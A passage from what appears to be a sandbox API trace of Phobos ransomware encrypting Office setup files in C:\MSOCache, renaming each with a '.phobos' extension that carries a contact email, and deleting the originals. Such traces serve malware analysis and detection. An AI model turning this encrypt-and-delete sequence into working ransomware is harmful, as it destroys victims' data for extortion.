dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0132.763] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1886) returned 1 [0132.763] CloseHandle (hObject=0x124) returned 1 [0132.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0132.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0132.763] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0132.763] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0132.764] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0132.764] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0132.765] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa28ec8) returned 1 [0132.765] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0132.765] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x75e, lpOverlapped=0x0) returned 1 [0133.216] CryptEncrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x760, dwBufLen=0x760 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x760) returned 1 [0133.216] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x760, lpOverlapped=0x0) returned 1 [0133.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e408) returned 1 [0133.217] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.217] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0133.217] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.217] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0133.217] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.217] CloseHandle (hObject=0x124) returned 1 [0133.217] CloseHandle (hObject=0x138) returned 1 [0133.218] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0133.219] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0133.274] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0133.275] ResetEvent (hEvent=0x108) returned 1 [0133.275] SetEvent (hEvent=0x10c) returned 1 [0133.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0133.275] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.275] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1608) returned 1 [0133.275] CloseHandle (hObject=0x12c) returned 1 [0133.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0133.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.275] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.275] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.275] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.275] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0133.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2f520) returned 1 [0133.276] CryptSetKeyParam (hKey=0xa2f520, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.276] ReadFile (in: hFile=0x12c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x648, lpOverlapped=0x0) returned 1 [0133.516] CryptEncrypt (in: hKey=0xa2f520, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x650, dwBufLen=0x650 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x650) returned 1 [0133.516] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x650, lpOverlapped=0x0) returned 1 [0133.517] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e408) returned 1 [0133.517] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.517] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0133.517] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.517] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0133.517] CryptDestroyKey (hKey=0xa2f520) returned 1 [0133.517] CloseHandle (hObject=0x12c) returned 1 [0133.518] CloseHandle (hObject=0x140) returned 1 [0133.518] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0133.525] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0133.527] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0133.527] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.529] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2424) returned 1 [0133.529] CloseHandle (hObject=0x12c) returned 1 [0133.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0133.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.529] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.529] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.529] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.529] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0133.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa28f08) returned 1 [0133.531] CryptSetKeyParam (hKey=0xa28f08, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.531] ReadFile (in: hFile=0x12c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x978, lpOverlapped=0x0) returned 1 [0133.684] CryptEncrypt (in: hKey=0xa28f08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x980, dwBufLen=0x980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x980) returned 1 [0133.684] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x980, lpOverlapped=0x0) returned 1 [0133.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa28ec8) returned 1 [0133.685] CryptSetKeyParam (hKey=0xa28ec8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.685] CryptEncrypt (in: hKey=0xa28ec8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0133.685] CryptDestroyKey (hKey=0xa28ec8) returned 1 [0133.686] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0133.686] CryptDestroyKey (hKey=0xa28f08) returned 1 [0133.686] CloseHandle (hObject=0x12c) returned 1 [0133.686] CloseHandle (hObject=0x130) returned 1 [0133.706] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0133.707] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0133.707] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0133.708] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1347) returned 1 [0133.708] CloseHandle (hObject=0x140) returned 1 [0133.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0133.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.709] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0133.709] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.709] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.709] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0133.710] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x543, lpOverlapped=0x0) returned 1 [0133.790] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x550, dwBufLen=0x550 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x550) returned 1 [0133.790] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x550, lpOverlapped=0x0) returned 1 [0133.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e518) returned 1 [0133.791] CryptSetKeyParam (hKey=0xa2e518, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.791] CryptEncrypt (in: hKey=0xa2e518, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0133.791] CryptDestroyKey (hKey=0xa2e518) returned 1 [0133.791] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0133.791] CryptDestroyKey (hKey=0xa2e408) returned 1 [0133.791] CloseHandle (hObject=0x140) returned 1 [0133.791] CloseHandle (hObject=0x134) returned 1 [0133.794] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0133.795] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0133.795] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.795] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1458) returned 1 [0133.795] CloseHandle (hObject=0x134) returned 1 [0133.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0133.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.795] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0133.795] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.795] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0133.795] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0133.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0133.796] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0133.796] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5b2, lpOverlapped=0x0) returned 1 [0134.389] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5c0) returned 1 [0134.389] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5c0, lpOverlapped=0x0) returned 1 [0134.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2ea98) returned 1 [0134.389] CryptSetKeyParam (hKey=0xa2ea98, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0134.389] CryptEncrypt (in: hKey=0xa2ea98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0134.389] CryptDestroyKey (hKey=0xa2ea98) returned 1 [0134.390] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0134.390] CryptDestroyKey (hKey=0xa2e408) returned 1 [0134.390] CloseHandle (hObject=0x134) returned 1 [0134.390] CloseHandle (hObject=0x140) returned 1 [0134.390] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0134.391] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0134.391] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0134.514] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1383) returned 1 [0134.514] CloseHandle (hObject=0x140) returned 1 [0134.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0134.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0134.514] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0134.514] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, 